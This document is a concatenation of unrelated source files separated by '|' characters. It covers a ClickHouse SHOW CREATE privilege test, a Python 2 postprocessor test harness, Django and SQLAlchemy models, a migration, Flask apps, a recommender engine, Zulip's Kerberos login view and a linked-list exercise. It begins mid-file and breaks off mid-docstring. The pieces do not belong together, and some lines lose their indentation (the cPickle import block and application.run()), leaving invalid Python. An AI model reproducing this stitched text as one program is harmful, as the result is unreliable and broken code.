        table_name = f"table_name_{getuid()}"
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Suite(test=show_create)(grant_target_name=role_name, user_name=user_name, table_name=table_name)
@TestSuite
@Requirements(
    RQ_SRS_006_RBAC_ShowCreateTable_RequiredPrivilege("1.0"),
)
def show_create(self, grant_target_name, user_name, table_name, node=None):
    """Check that user is able to execute SHOW CREATE on a table only when they have SHOW COLUMNS privilege.

    grant_target_name -- entity (user or role) that privileges are granted to
    user_name -- user executing the SHOW CREATE statements
    table_name -- table under test (created by the `table` context manager)
    """
    exitcode, message = errors.not_enough_privileges(name=user_name)
    if node is None:
        node = self.context.node
    with table(node, table_name):
        with Scenario("SHOW CREATE without privilege"):
            with When("I grant the user NONE privilege"):
                node.query(f"GRANT NONE TO {grant_target_name}")
            with And("I grant the user USAGE privilege"):
                node.query(f"GRANT USAGE ON *.* TO {grant_target_name}")
            with Then(f"I attempt to SHOW CREATE {table_name}"):
                node.query(f"SHOW CREATE TABLE {table_name}", settings=[("user",user_name)],
                    exitcode=exitcode, message=message)
        with Scenario("SHOW CREATE with privilege"):
            with When(f"I grant SHOW COLUMNS on the table"):
                node.query(f"GRANT SHOW COLUMNS ON {table_name} TO {grant_target_name}")
            with Then(f"I attempt to SHOW CREATE {table_name}"):
                node.query(f"SHOW CREATE TABLE {table_name}", settings=[("user",user_name)])
        with Scenario("SHOW CREATE with revoked privilege"):
            with When(f"I grant SHOW COLUMNS on the table"):
                node.query(f"GRANT SHOW COLUMNS ON {table_name} TO {grant_target_name}")
            with And(f"I revoke SHOW COLUMNS on the table"):
                node.query(f"REVOKE SHOW COLUMNS ON {table_name} FROM {grant_target_name}")
            with Then(f"I attempt to SHOW CREATE {table_name}"):
                node.query(f"SHOW CREATE TABLE {table_name}", settings=[("user",user_name)],
                    exitcode=exitcode, message=message)
        with Scenario("SHOW CREATE with ALL privilege"):
            # NOTE(review): step description says SHOW COLUMNS but the query grants ALL.
            with When(f"I grant SHOW COLUMNS on the table"):
                node.query(f"GRANT ALL ON *.* TO {grant_target_name}")
            with Then(f"I attempt to SHOW CREATE {table_name}"):
                node.query(f"SHOW CREATE TABLE {table_name}", settings=[("user",user_name)])
@TestFeature
@Name("show columns")
@Requirements(
    RQ_SRS_006_RBAC_ShowColumns_Privilege("1.0"),
    RQ_SRS_006_RBAC_Privileges_All("1.0"),
    RQ_SRS_006_RBAC_Privileges_None("1.0")
)
def feature(self, node="clickhouse1"):
    """Check the RBAC functionality of SHOW COLUMNS.

    Runs all DESCRIBE / SHOW CREATE suites against the given cluster node.
    """
    self.context.node = self.context.cluster.node(node)
    Suite(run=describe_with_privilege_granted_directly, setup=instrument_clickhouse_server_log)
    Suite(run=describe_with_privilege_granted_via_role, setup=instrument_clickhouse_server_log)
    Suite(run=show_create_with_privilege_granted_directly, setup=instrument_clickhouse_server_log)
    Suite(run=show_create_with_privilege_granted_via_role, setup=instrument_clickhouse_server_log)
|
#!/usr/bin/python
# coding: utf-8
try:
import cPickle as pickle
except ImportError:
import pickle
import threading
import os
import sys
import ConfigParser
import base64
import logging
import json
import time
from subprocess import Popen
from subprocess import PIPE
from cement.core import foundation
from dc.EventObjects import URL
from dc.EventObjects import Batch
from dc.EventObjects import BatchItem
from dc.EventObjects import URLContentResponse
import app.Consts as APP_CONSTS
import app.Utils as Utils
from app.Utils import varDump
from dc_postprocessor.PostprocessorTask import PostprocessorTask
from dc_postprocessor.PostProcessingApplicationClass import PostProcessingApplicationClass
from dc_postprocessor.LinkResolver import LinkResolver
def getLogger():
    """Build and return a DEBUG-level console logger named 'console'.

    NOTE: each call adds another StreamHandler to the same named logger.
    """
    console_logger = logging.getLogger('console')
    console_logger.setLevel(logging.DEBUG)
    # Console handler mirroring the logger's DEBUG level.
    handler = logging.StreamHandler()
    handler.setLevel(logging.DEBUG)
    handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
    console_logger.addHandler(handler)
    return console_logger
def getFileLogger():
    """Configure file logging from the postprocessor ini and return the logger.

    Temporarily chdirs to the parent directory because the ini uses relative
    paths, then restores the working directory.
    """
    # Bug fix: logging.config is a submodule; plain `import logging` (the only
    # logging import in this file) does not make logging.config available.
    import logging.config
    configName = '../ini/postprocessor_task_log-rt.ini'
    retval = os.getcwd()
    os.chdir('..')
    # read config
    logging.config.fileConfig(configName)
    # create logger
    log = Utils.MPLogger().getLogger()
    # log = logging.getLogger(APP_CONSTS.LOGGER_NAME)
    os.chdir(retval)
    return log
# # execute command line command
#
# @param cmd - command line string
# @param inputStream - input stream to popen
# @return result object of execution and exit code
def executeCommand(cmd, inputStream=None, log=None):
    if log is not None:
        log.debug("Popen: %s", str(cmd))
    # shell=True: `cmd` is interpreted by the shell (callers pass composed pipelines).
    process = Popen(cmd, stdout=PIPE, stdin=PIPE, stderr=PIPE, shell=True, close_fds=True)
    # `basestring` makes this module Python-2-only.
    if isinstance(inputStream, basestring) and log is not None:
        log.debug("process.communicate(), len(inputStream)=" + str(len(inputStream)))
    (output, err) = process.communicate(input=inputStream)
    if log is not None:
        log.debug("Process std_error: %s", str(err))
        log.debug("Process output len =" + str(len(output)))
    # communicate() already waited; wait() just fetches the stored exit status.
    exitCode = process.wait()
    if log is not None:
        log.debug("Process response exitCode: %s", str(exitCode))
    return output, exitCode
def generateBatch(id=0):
    """Build a one-item Batch for the link-resolver postprocessor test.

    The processed content is a base64-encoded JSON dict {'link': url}; the
    batch item's LINK_RESOLVE property selects the GET method for
    retrip.jp external links.
    """
    siteId = id
    url = 'https://retrip.jp/external-link/?article_content_id=482406'
    urlObj = URL(siteId, url)
    processedContent = {'link':url}
    # Python 2: b64encode accepts the str returned by json.dumps directly.
    processedContents = [base64.b64encode(json.dumps(processedContent))]
    urlContentResponse = URLContentResponse(url=url, processedContents=processedContents)
    batchItem = BatchItem(siteId=siteId, urlId=urlObj.urlMd5, urlObj=urlObj, urlContentResponse=urlContentResponse)
    batchItem.properties = {"LINK_RESOLVE":{"method":{"retrip.jp/external-link":"GET"}}}
    # batchItem.properties = {}
    return Batch(id, batchItems=[batchItem])
def generateInputStream(id=0):
    """Pickle a generated Batch for feeding to the postprocessor task.

    Bug fix: the ``id`` argument was previously ignored (the call hard-coded
    ``id=0``); it is now forwarded to generateBatch().
    """
    return pickle.dumps(generateBatch(id=id))
def test(id=0, log=None):
    """Run one end-to-end postprocessor_task invocation via the shell."""
    # NOTE(review): `id` is not forwarded to generateInputStream() and the file
    # names are fixed -- all concurrent threads share the same input/output files.
    inputFile = '/tmp/input.tmp'
    outputFile = '/tmp/output.tmp'
    cmd = "cd ..; ../bin/postprocessor_task.py --config=../ini/postprocessor_task-rt.ini --inputFile=%s > %s" % (str(inputFile), str(outputFile))
    # Pickle bytes written in text mode -- fine on Python 2 / POSIX only.
    f = open(inputFile, 'w')
    f.write(generateInputStream())
    f.close()
    output, exitCode = executeCommand(cmd, log=log)
    if log is not None:
        log.debug("len(output) = %s", str(len(output)))
        log.debug("exitCode: %s", str(exitCode))
        log.debug("===Finish===")
def threadRun(id=0, log=None):
    """Thread target: run one test() invocation, announcing start/stop on stdout."""
    sys.stdout.write("Thread ID = %s started.\n" % str(id))
    test(id=id, log=log)
    sys.stdout.write("Thread ID = %s stopped.\n" % str(id))
if __name__ == '__main__':
    logger = getLogger()
    # logger = getFileLogger()
    testCount = 5
    threadsList = []
    # Start `testCount` concurrent end-to-end runs (xrange: Python 2 only).
    for i in xrange(testCount):
        threadsList.append(threading.Thread(target=threadRun, kwargs={'id':i, 'log':logger}))
        threadsList[-1].start()
    # Wait for all runs to finish.
    for i in xrange(testCount):
        threadsList[i].join()
    # #test(id=1, log=logger)
|
from django.db import models
class Pokemon(models.Model):
    """Django model for a Pokemon, its base stats and evolution links.

    ``pokemon_id`` (an externally supplied id) is the primary key.
    """
    name = models.CharField(max_length=200, unique=True, blank=False)
    pokemon_id = models.IntegerField(unique=True, blank=False, primary_key=True)
    # Physical attributes; default to 0 when unknown.
    weight = models.IntegerField(default=0)
    height = models.IntegerField(default=0)
    # Base battle stats; default to 0 when unknown.
    hp = models.IntegerField(default=0)
    attack = models.IntegerField(default=0)
    defense = models.IntegerField(default=0)
    specialAttack = models.IntegerField(default=0)
    specialDefense = models.IntegerField(default=0)
    speed = models.IntegerField(default=0)
    # Directed (non-symmetrical) self-referencing relations.
    # NOTE(review): two M2M fields to "self" where only `evolutions` sets an
    # explicit related_name — confirm Django raises no reverse-accessor clash.
    evolutions = models.ManyToManyField("self", symmetrical=False, related_name="%(app_label)s_%(class)s_related")
    preEvolution = models.ManyToManyField("self", symmetrical=False)
    def __str__(self):
        # e.g. "25: Pikachu"
        return '%d: %s' % (self.pokemon_id, self.name)
|
from flask import request, render_template
from flask_socketio import emit
from datetime import datetime
from . import data_holder
from .app import app, socket
def _broadcast(payload: dict):
    """Emit *payload* to every connected client on the root namespace."""
    emit('emit', payload, namespace='/', broadcast=True)
def _emit(payload: dict):
    """Emit *payload* only to the requesting client."""
    emit('emit', payload, namespace='/', broadcast=False)
@socket.on('connect')
def connect():
    """Replay the stored log history to a newly connected client."""
    for entry in data_holder.view():
        _emit(entry)
@socket.on('broadcast_event')
def log_via_websocket(message: dict):
    """Socket.IO entry point: pull the 'log' field out of *message* and record it."""
    log_text = message.get('log', None)
    _log(log_text)
@app.route("/", methods=['POST'])
def log_via_http():
    """HTTP entry point: accept a JSON body with a 'log' field and record it."""
    body: dict = request.get_json()
    _log(body.get('log', None))
    return 'ack'
def _log(msg: str):
    """Strip, store and broadcast a log message; ignore None/blank input.

    Bug fix: the payload previously stored the original unstripped ``msg``
    even though the stripped value was computed and used for the emptiness
    check — now the stripped text is what gets stored and broadcast.
    """
    if msg is None:
        return
    stripped = str.strip(msg)
    if stripped:
        payload = {'timestamp': str(datetime.now()), 'log': stripped}
        data_holder.append(payload)
        _broadcast(payload)
@app.route("/", methods=['GET'])
def index():
    """Serve the single-page log viewer."""
    return render_template('index.html')
from flask import Flask, render_template, request
import json
import os
import psycopg2
application = Flask(__name__)
# Absolute path to the bundled static assets directory.
STATIC_PATH = os.path.dirname(os.path.abspath(__file__)) + "/static"
# Single module-level PostgreSQL connection, configured from the standard
# PG* environment variables.
# NOTE(review): one shared connection is not safe under concurrent requests
# and is never re-established if it drops — consider a connection pool.
conn = psycopg2.connect(
    user=os.environ.get("PGUSER"),
    host=os.environ.get("PGHOST"),
    port=os.environ.get("PGPORT"),
    password=os.environ.get("PGPASSWORD"),
    database=os.environ.get("PGDATABASE")
)
@application.route('/')
def home():
    """Render the index page with every row from the ``testing`` table.

    Fix: the cursor was previously never closed; using it as a context
    manager guarantees it is closed even if the query raises.
    """
    with conn.cursor() as cur:
        cur.execute("select * from testing")
        words = cur.fetchall()
    return render_template('index.html', testing=words)
if __name__ == "__main__":
application.run()
|
from enum import Enum
from sqlalchemy import Column, Integer, String
from sqlalchemy_utils.types import URLType
from upload.db.base_class import Base
class FileStatusEnum(str, Enum):
    """Processing statuses available for an uploaded file."""

    new = "new"
    in_queue = "in queue"
    finished = "finished"
class FileResultEnum(str, Enum):
    """Possible final verdicts once file processing completes."""

    allowed = "allowed"
    restricted = "restricted"
class File(Base):
    """Model of a file uploaded into the system."""
    # Surrogate primary key.
    id = Column(Integer, primary_key=True, index=True)
    # Owner's user id (plain integer, not declared as a foreign key here).
    user_id = Column(Integer, primary_key=False, index=True, nullable=False)
    # Processing status; starts at FileStatusEnum.new.
    status = Column(String, nullable=False, default=FileStatusEnum.new, index=True)
    # Processing verdict; nullable (presumably a FileResultEnum value — verify).
    result = Column(String, nullable=True, index=True)
    # Media kind; defaults to "audio".
    type = Column(String, nullable=False, default="audio", index=True)
    # Where the uploaded file is stored on disk.
    saved_file_path = Column(String, nullable=False)
    download_url = Column(URLType, nullable=True)
    # Optional recognized-track metadata.
    artist = Column(String, nullable=True)
    title = Column(String, nullable=True)
    song_link = Column(URLType, nullable=True)
|
# Generated by Django 2.1.5 on 2019-02-13 03:45
from django.db import migrations, models
class Migration(migrations.Migration):
    """Give Profile.bio and Profile.status human-readable defaults."""

    dependencies = [
        ('users', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='profile',
            name='bio',
            field=models.TextField(default='Bio'),
        ),
        migrations.AlterField(
            model_name='profile',
            name='status',
            field=models.CharField(default='Status', max_length=100),
        ),
    ]
|
"""
Recommendations Engine
===============
Business Objective:
To recommend applications to users that they might find useful in their everyday objectives
Website Link: https://github.com/aml-development/ozp-documentation/wiki/Recommender-%282017%29
Data that could be used for recommendations
- Listing Bookmarked
- Keep track of folder apps
Recommendations are based on individual users
Assumptions:
45,000 Users
350 Listings
Worst Case Number of Recommendations = 15,750,000
Steps:
- Load data for each user
- Process data with the recommendation algorithm
- Produce a list of listing ids for each profile = Results
- Iterate through the Results to call add_listing_to_user_profile function
Idea:
Jitting Result
"""
import logging
import time
import msgpack
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Count
from django.db import transaction
from django.conf import settings
from ozpcenter import models
from ozpcenter.recommend import recommend_utils
from ozpcenter.recommend import recommend_es
from ozpcenter.recommend.graph_factory import GraphFactory
from ozpcenter.api.listing.elasticsearch_util import elasticsearch_factory
logger = logging.getLogger('ozp-center.' + str(__name__))
class ProfileResultSet(object):
    """Accumulates listing scores per profile.

    ``recommender_result_set`` maps profile id -> {listing id: score}::

        {
            profile_id#1: {
                listing_id#1: score#1,
                listing_id#2: score#2
            },
            profile_id#2: {
                listing_id#1: score#1,
                listing_id#2: score#2,
                listing_id#3: score#3,
            }
        }
    """

    def __init__(self):
        self.recommender_result_set = {}

    def add_listing_to_user_profile(self, profile_id, listing_id, score, cumulative=False):
        """Record *score* for (profile_id, listing_id).

        When *cumulative* is true and a (truthy) score already exists it is
        added to; otherwise the stored score is replaced.

        Improvement: the original triple-nested branching duplicated the
        "store float(score)" assignment three times; ``setdefault`` collapses
        the missing-profile and missing-listing cases into one path while
        preserving the exact original semantics (including overwriting a
        stored 0.0, which is numerically identical to adding to it).
        """
        profile_scores = self.recommender_result_set.setdefault(profile_id, {})
        if cumulative and profile_scores.get(listing_id):
            profile_scores[listing_id] = profile_scores[listing_id] + float(score)
        else:
            profile_scores[listing_id] = float(score)
class RecommenderProfileResultSet(object):
    """Per-profile container mapping a recommender engine's friendly name
    to its recommendations, weight and timing.

    Layout of ``recommender_result_set``::

        {
            recommender_friendly_name#1: {
                'recommendations': {listing_id#1: score#1, listing_id#2: score#2},
                'weight': 1.0,
                'ms_took': 3000
            },
            recommender_friendly_name#2: {
                'recommendations': {listing_id#1: score#1, ...},
                'weight': 1.0,
                'ms_took': 5050
            }
        }
    """

    def __init__(self, profile_id):
        self.profile_id = profile_id
        self.recommender_result_set = {}

    def merge(self, recommender_friendly_name, recommendation_weight, current_recommendations, recommendations_time):
        """Store one recommender engine's results for this profile.

        The first entry recorded for a given friendly name wins; a later
        merge under the same name is silently ignored.

        Args:
            recommender_friendly_name: Recommender friendly name
            recommendation_weight: Recommender weight
            current_recommendations: {listing_id: score} mapping
            recommendations_time: Recommender runtime in ms
        """
        if recommender_friendly_name in self.recommender_result_set:
            return
        self.recommender_result_set[recommender_friendly_name] = {
            'recommendations': current_recommendations,
            'weight': recommendation_weight,
            'ms_took': recommendations_time,
        }

    def __repr__(self):
        return str(self.recommender_result_set)
class RecommenderResultSet(object):
    """Aggregate of recommendation results across all profiles.

    ``recommender_result_set`` maps
    profile_id -> RecommenderProfileResultSet.  Serialized, each profile
    entry becomes::

        {
            recommender_friendly_name: {
                'recommendations': [[listing_id, score], ...],
                'weight': 1.0,
                'ms_took': 5050
            },
            ...
        }
    """

    def __init__(self):
        self.recommender_result_set = {}

    def __repr__(self):
        return str(self.recommender_result_set)

    def merge(self, recommender_friendly_name, recommendation_weight, profile_result_set, recommendations_time):
        """Fold one recommender engine's ProfileResultSet into this aggregate.

        Creates a RecommenderProfileResultSet for any profile not seen yet,
        then delegates the per-profile merge to it.

        Args:
            recommender_friendly_name: Recommender friendly name
            recommendation_weight: Recommender weight
            profile_result_set(ProfileResultSet): Recommender results
            recommendations_time: Recommender runtime in ms
        """
        for profile_id, current_recommendations in profile_result_set.recommender_result_set.items():
            if profile_id not in self.recommender_result_set:
                self.recommender_result_set[profile_id] = RecommenderProfileResultSet(profile_id)
            self.recommender_result_set[profile_id].merge(
                recommender_friendly_name,
                recommendation_weight,
                current_recommendations,
                recommendations_time)
class BaselineRecommender(object):
    """
    Baseline Recommender

    Combines several simple, explainable signals into one cumulative score
    per (profile, listing) pair: featured listings, recently approved
    listings, highly rated listings, and globally popular bookmarks.

    Assumptions:
    - Listing has ratings and possibly has no ratings
    - Listing can be featured
    - Users bookmark Listings
    - Users have bookmark folders, a collection of listings in a folder
    - Listing has total_reviews field

    Requirements:
    - Recommendations should be explainable and believable
    - Must respect private apps
    - Does not have to respect security_marking while saving to db
    """
    friendly_name = 'Baseline'
    recommendation_weight = 1.0
    def initiate(self):
        """
        Initiate any variables needed for recommendation_logic function.
        No-op for this recommender.
        """
        pass
    def recommendation_logic(self):
        """
        Sample Recommendations for all users.

        Writes scores into ``self.profile_result_set`` (a ProfileResultSet
        injected by RecommenderDirectory before this method is called).
        """
        all_profiles = models.Profile.objects.all()
        all_profiles_count = len(all_profiles)
        current_profile_count = 0
        for profile in all_profiles:
            current_profile_count = current_profile_count + 1
            logger.debug('Calculating Profile {}/{}'.format(current_profile_count, all_profiles_count))
            profile_id = profile.id
            profile_username = profile.user.username
            # Get Featured Listings: flat cumulative score of 3.0 each.
            featured_listings = models.Listing.objects.for_user_organization_minus_security_markings(
                profile_username).order_by('-approved_date').filter(
                    is_featured=True,
                    approval_status=models.Listing.APPROVED,
                    is_enabled=True,
                    is_deleted=False)[:36]
            for current_listing in featured_listings:
                self.profile_result_set.add_listing_to_user_profile(profile_id, current_listing.id, 3.0, True)
            # Get Recent Listings: newest non-featured approved listings, 2.0 each.
            recent_listings = models.Listing.objects.for_user_organization_minus_security_markings(
                profile_username).order_by(
                '-approved_date').filter(
                    is_featured=False,
                    approval_status=models.Listing.APPROVED,
                    is_enabled=True,
                    is_deleted=False)[:36]
            for current_listing in recent_listings:
                self.profile_result_set.add_listing_to_user_profile(profile_id, current_listing.id, 2.0, True)
            # Get most popular listings via a weighted average; the score is
            # the listing's average rating (unrated listings are skipped).
            most_popular_listings = models.Listing.objects.for_user_organization_minus_security_markings(
                profile_username).filter(
                approval_status=models.Listing.APPROVED,
                is_enabled=True,
                is_deleted=False).order_by('-avg_rate', '-total_reviews')[:36]
            for current_listing in most_popular_listings:
                if current_listing.avg_rate != 0:
                    self.profile_result_set.add_listing_to_user_profile(profile_id, current_listing.id, current_listing.avg_rate, True)
            # Get most popular bookmarked apps for all users.
            # NOTE(review): could this block run once outside the profile loop?
            library_entries = models.ApplicationLibraryEntry.objects.for_user_organization_minus_security_markings(profile_username)
            library_entries = library_entries.filter(listing__is_enabled=True)
            library_entries = library_entries.filter(listing__is_deleted=False)
            library_entries = library_entries.filter(listing__approval_status=models.Listing.APPROVED)
            library_entries_group_by_count = library_entries.values('listing_id').annotate(count=Count('listing_id')).order_by('-count')
            # Result shape: [{'listing_id': 1, 'count': 1}, {'listing_id': 2, 'count': 1}]
            # Calculation of min and max new scores dynamically. This rescales the
            # bookmark counts into the range [2, 5] so they stay comparable with
            # the other signals above.
            old_min = 1
            old_max = 1
            new_min = 2
            new_max = 5
            # First pass: find the observed bookmark-count range.
            for entry in library_entries_group_by_count:
                count = entry['count']
                if count == 0:
                    continue
                if count > old_max:
                    old_max = count
                if count < old_min:
                    old_min = count
            # Second pass: rescale each count into [new_min, new_max] and record it.
            for entry in library_entries_group_by_count:
                listing_id = entry['listing_id']
                count = entry['count']
                calculation = recommend_utils.map_numbers(count, old_min, old_max, new_min, new_max)
                self.profile_result_set.add_listing_to_user_profile(profile_id, listing_id, calculation, True)
class GraphCollaborativeFilteringBaseRecommender(object):
    """
    Graph Collaborative Filtering based on Bookmarks.

    Loads the database into an in-memory graph and asks its algorithm for
    listing recommendations per profile.
    """
    friendly_name = 'Bookmark Collaborative Filtering'
    recommendation_weight = 5.0
    def initiate(self):
        """
        Initiate any variables needed for recommendation_logic function:
        the graph built from the whole database plus the profile list.
        """
        self.graph = GraphFactory.load_db_into_graph()
        self.all_profiles = models.Profile.objects.all()
        self.all_profiles_count = len(self.all_profiles)
    def recommendation_logic(self):
        """
        Recommendation logic.

        Writes scores into ``self.profile_result_set`` (injected by
        RecommenderDirectory before this method is called).
        """
        current_profile_count = 0
        for profile in self.all_profiles:
            profile_id = profile.id
            current_profile_count = current_profile_count + 1
            logger.debug('Calculating Profile {}/{}'.format(current_profile_count, self.all_profiles_count))
            results = self.graph.algo().recommend_listings_for_profile('p-{}'.format(profile_id))  # bigbrother
            for current_tuple in results:
                listing_raw = current_tuple[0]  # vertex key of the form 'l-#'
                listing_id = int(listing_raw.split('-')[1])
                score = current_tuple[1]
                # No need to rebase since results are within the range of others based on testing:
                self.profile_result_set.add_listing_to_user_profile(profile_id, listing_id, score)
# Decorated with @transaction.atomic so the whole batch commits or none of it does.
@transaction.atomic
def bulk_recommendations_saver(recommendation_entries):
    """Persist a batch of recommendation entries in one database transaction.

    Each entry is a dict with 'target_profile' and 'recommendation_data' keys.
    Entries are assumed to be new rows (callers delete stale rows beforehand).
    """
    for entry in recommendation_entries:
        new_row = models.RecommendationsEntry(
            target_profile=entry['target_profile'],
            recommendation_data=entry['recommendation_data'])
        new_row.save()
class RecommenderDirectory(object):
    """
    Wrapper for all Recommenders.

    Resolves engine names to recommender classes, runs each engine, merges
    their results into one RecommenderResultSet, and persists it.
    """
    def __init__(self):
        # Registry of engine name -> recommender class.
        self.recommender_classes = {
            'elasticsearch_user_base': recommend_es.ElasticsearchUserBaseRecommender,
            'elasticsearch_content_base': recommend_es.ElasticsearchContentBaseRecommender,
            'baseline': BaselineRecommender,
            'graph_cf': GraphCollaborativeFilteringBaseRecommender,
        }
        self.recommender_result_set_obj = RecommenderResultSet()
    def _iterate_recommenders(self, recommender_string):
        """
        Convert recommender string into Recommender instances.

        Yields (recommender instance, friendly name, weight) for each known
        comma-separated engine name; unknown names are logged and skipped.
        """
        for current_recommender in recommender_string.split(','):
            current_recommender_string = current_recommender.strip()
            if current_recommender_string in self.recommender_classes:
                current_recommender_obj = self.recommender_classes[current_recommender_string]()
                # Each engine writes into its own fresh result set.
                current_recommender_obj.profile_result_set = ProfileResultSet()
                current_recommender_class = current_recommender_obj.__class__
                # Fall back to the class name when no friendly_name is declared.
                friendly_name = current_recommender_class.__name__
                if hasattr(current_recommender_class, 'friendly_name'):
                    friendly_name = current_recommender_class.friendly_name
                recommendation_weight = 1.0
                if hasattr(current_recommender_class, 'recommendation_weight'):
                    recommendation_weight = current_recommender_class.recommendation_weight
                yield current_recommender_obj, friendly_name, recommendation_weight
            else:
                logger.warn('Recommender Engine [{}] Not Found'.format(current_recommender))
    def recommend(self, recommender_string):
        """
        Creates Recommender Objects and executes each one, then saves.

        Args:
            recommender_string: Comma Delimited list of Recommender Engines to execute
        """
        start_ms = time.time() * 1000.0
        for recommender_obj, friendly_name, recommendation_weight in self._iterate_recommenders(recommender_string):
            logger.info('=={}=='.format(friendly_name))
            if hasattr(recommender_obj, 'initiate'):
                # initiate - Used for initiating variables, classes, objects, connecting to services
                recommender_obj.initiate()
            recommendations_start_ms = time.time() * 1000.0
            if not hasattr(recommender_obj, 'recommendation_logic'):
                raise Exception('Recommender instance needs recommendation_logic method')
            recommender_obj.recommendation_logic()
            profile_result_set = recommender_obj.profile_result_set
            logger.debug(profile_result_set)
            recommendations_end_ms = time.time() * 1000.0
            recommendations_time = recommendations_end_ms - recommendations_start_ms
            logger.info('Merging {} into results'.format(friendly_name))
            self.recommender_result_set_obj.merge(friendly_name, recommendation_weight, profile_result_set, recommendations_time)
        logger.info('==Start saving recommendations into database==')
        start_db_ms = time.time() * 1000.0
        self.save_to_db()
        end_db_ms = time.time() * 1000.0
        logger.info('Save to database took: {} ms'.format(end_db_ms - start_db_ms))
        logger.info('Whole Process: {} ms'.format(end_db_ms - start_ms))
    def save_to_db(self):
        """
        Stores the merged recommendations into the database in batches.

        Performance notes (historical):
            Pre-refactor  - Save to database took: 2477.896240234375 ms, Database Calls: 1178
            Post-refactor - Save to database took: 101.677978515625 ms, Database Calls: 584
            transaction.atomic() - 430 ms
            Without Atomic and Batch - 1400 ms
        """
        recommender_result_set = self.recommender_result_set_obj.recommender_result_set
        batch_list = []
        # Get all profiles in recommender_result_set.
        profile_id_list = list(set([profile_id for profile_id in recommender_result_set]))
        profile_query = models.Profile.objects.filter(id__in=profile_id_list)
        profile_dict = {profile.id: profile for profile in profile_query}
        listing_dict = {listing.id: listing for listing in models.Listing.objects.all()}
        # Delete existing RecommendationsEntry rows for the affected profiles.
        profile_query = models.Profile.objects.filter(id__in=profile_id_list)
        models.RecommendationsEntry.objects.filter(target_profile__in=profile_query).delete()
        for profile_id in recommender_result_set:
            profile = profile_dict.get(profile_id)
            if profile:
                for current_recommender_friendly_name in recommender_result_set[profile_id].recommender_result_set:
                    output_current_tuples = []
                    current_recommendations = recommender_result_set[profile_id].recommender_result_set[current_recommender_friendly_name]['recommendations']
                    # Keep only the 20 best-scoring listings per engine.
                    sorted_recommendations = recommend_utils.get_top_n_score(current_recommendations, 20)
                    for current_recommendation_tuple in sorted_recommendations:
                        current_listing_id = current_recommendation_tuple[0]
                        current_listing = listing_dict.get(current_listing_id)
                        # Drop listings that no longer exist in the database.
                        if current_listing:
                            output_current_tuples.append(current_recommendation_tuple)
                    recommender_result_set[profile_id].recommender_result_set[current_recommender_friendly_name]['recommendations'] = output_current_tuples
                batch_list.append({'target_profile': profile,
                                   'recommendation_data': msgpack.packb(recommender_result_set[profile_id].recommender_result_set)})
                # Flush in batches of 1000 to bound memory and transaction size.
                if len(batch_list) >= 1000:
                    bulk_recommendations_saver(batch_list)
                    batch_list = []
        if batch_list:
            bulk_recommendations_saver(batch_list)
|
import base64
import logging
import re
import shlex
import subprocess
from email.headerregistry import Address
from typing import Optional
import orjson
from django.conf import settings
from django.http import HttpRequest, HttpResponse
from django.utils.translation import gettext as _
from zerver.decorator import authenticated_json_view
from zerver.lib.ccache import make_ccache
from zerver.lib.exceptions import JsonableError
from zerver.lib.pysa import mark_sanitized
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.response import json_success
from zerver.lib.users import get_api_key
from zerver.models import UserProfile
# Hack for mit.edu users whose Kerberos usernames don't match what they zephyr
# as. The key is for Kerberos and the value is for zephyr.
# i.e. maps Kerberos principal name -> zephyr username.
kerberos_alter_egos = {
    "golem": "ctl",
}
@authenticated_json_view
@has_request_variables
def webathena_kerberos_login(
    request: HttpRequest, user_profile: UserProfile, cred: Optional[str] = REQ(default=None)
) -> HttpResponse:
    """Accept a Webathena-provided Kerberos credential and set up zephyr
    mirroring for the requesting user.

    The credential's username is validated against the user's email
    local-part and restricted to benign characters, converted into a
    Kerberos ccache, and shipped to the personal zmirror server over ssh.

    Raises JsonableError for a missing/invalid credential, a realm with
    Webathena disabled, or any mirroring-setup failure.
    """
    if cred is None:
        raise JsonableError(_("Could not find Kerberos credential"))
    if not user_profile.realm.webathena_enabled:
        raise JsonableError(_("Webathena login not enabled"))
    try:
        parsed_cred = orjson.loads(cred)
        user = parsed_cred["cname"]["nameString"][0]
        # Map Kerberos principal to zephyr username for known special cases.
        if user in kerberos_alter_egos:
            user = kerberos_alter_egos[user]
        assert user == Address(addr_spec=user_profile.email).username
        # Limit characters in usernames to valid MIT usernames
        # This is important for security since DNS is not secure.
        assert re.match(r"^[a-z0-9_.-]+$", user) is not None
        ccache = make_ccache(parsed_cred)
        # 'user' has been verified to contain only benign characters that won't
        # help with shell injection.
        user = mark_sanitized(user)
        # 'ccache' is only written to disk by the script and used as a kerberos
        # credential cache file.
        ccache = mark_sanitized(ccache)
    except Exception:
        raise JsonableError(_("Invalid Kerberos cache"))
    if settings.PERSONAL_ZMIRROR_SERVER is None:
        logging.error("PERSONAL_ZMIRROR_SERVER is not properly configured", stack_info=True)
        raise JsonableError(_("We were unable to set up mirroring for you"))
    # TODO: Send these data via (say) RabbitMQ
    try:
        api_key = get_api_key(user_profile)
        command = [
            "/home/zulip/python-zulip-api/zulip/integrations/zephyr/process_ccache",
            user,
            api_key,
            base64.b64encode(ccache).decode(),
        ]
        # shlex.join keeps the remote command safely quoted as a single ssh argument.
        subprocess.check_call(["ssh", settings.PERSONAL_ZMIRROR_SERVER, "--", shlex.join(command)])
    except subprocess.CalledProcessError:
        logging.exception("Error updating the user's ccache", stack_info=True)
        raise JsonableError(_("We were unable to set up mirroring for you"))
    return json_success(request)
|
# @Time : 2021/2/1 11:42 下午
# @Author : Xingyou Chen
# @File : linklist_postorder.py
# @Software: PyCharm
class linknode():
    """Singly linked list node holding a value and a next pointer."""

    def __init__(self, value):
        self.data = value
        self.next = None
def create_link(li):
    """Build a singly linked list from a non-empty sequence.

    :param li: non-empty sequence of values
    :return: the head node
    """
    head = linknode(li[0])
    tail = head
    for value in li[1:]:
        tail.next = linknode(value)
        tail = tail.next  # the final node's next pointer stays None
    return head
def print_link(head):
    """Print every node's data from head to tail.

    :param head: head node of a linked list, or None for an empty list
    :return: None
    """
    node = head
    while node is not None:
        print(node.data)
        node = node.next
# Demo: build a list from sample data and print it front to back.
li = [3,4,5,1,2]
head = create_link(li)
print_link(head)
def reverseLink(head):
    """Reverse a singly linked list in place and return the new head.

    Walks the list once; for each node it (1) remembers the rest of the
    list, (2) repoints ``next`` at the previously processed node, then
    (3) advances.  Uses two cursors: the already-reversed prefix and the
    node currently being processed.

    :param head: head node, or None for an empty list
